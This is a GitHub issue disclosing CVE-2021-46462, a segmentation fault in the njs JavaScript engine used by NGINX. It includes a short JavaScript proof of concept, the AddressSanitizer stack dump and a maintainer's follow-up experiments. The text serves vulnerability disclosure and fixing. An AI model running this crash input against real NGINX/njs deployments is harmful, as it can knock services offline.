Headline
CVE-2021-46462: SEGV /njs/src/njs_object.c:2136:24 in njs_object_set_prototype · Issue #449 · nginx/njs
njs through 0.7.1, used in NGINX, was discovered to contain a segmentation violation via njs_object_set_prototype in /src/njs_object.c.
Env
Version : 0.7.0
Git Commit : 2da5d8b246b806bee6f74b575217ec3b61a25548
OS : Ubuntu 20.04
Configure : ./configure --address-sanitizer=YES
POC
function main() {
const v3 = [23490,23490,23490,23490];
const v4 = {};
v3.length = 1577595327;
const v9 = Object.apply(...v4,v3);
v3.__proto__ = v9;
}
main();
Stack Dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==466519==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x00000050d6d4 bp 0x7ffc8e2432f0 sp 0x7ffc8e2432e0 T0)
==466519==The signal is caused by a READ memory access.
==466519==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used.
#0 0x50d6d4 in njs_object_set_prototype /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2136:24
#1 0x50d6d4 in njs_object_prototype_proto /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2162:19
#2 0x4d9f03 in njs_value_property_set /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_value.c:1215:19
#3 0x4e45f5 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:658:23
#4 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11
#5 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23
#6 0x4dea17 in njs_vm_start /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vm.c:493:11
#7 0x4c7f3d in njs_process_script /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:881:19
#8 0x4c7375 in njs_process_file /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:615:11
#9 0x4c7375 in main /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:315:15
#10 0x7f3d5b6190b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#11 0x41dabd in _start (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x41dabd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2136:24 in njs_object_set_prototype
==466519==ABORTING
Credit
P1umer, afang5472, Kotori of NeSE@IIE
Copy link
Contributor
drsm commented Dec 24, 2021
maybe related:
>> (() => {}).apply({}, Array(2**10)); undefined >> (() => {}).apply({}, Array(2**13)); Thrown: RangeError: Maximum call stack size exceeded at Function.prototype.apply (native) at main (shell:1)
>> (() => {}).apply({}, Array(2**30)); undefined >> (() => {}).apply({}, Array(2**32)); Thrown: RangeError: Invalid array length at Array (native) at Function.prototype.apply (native) at main (shell:1)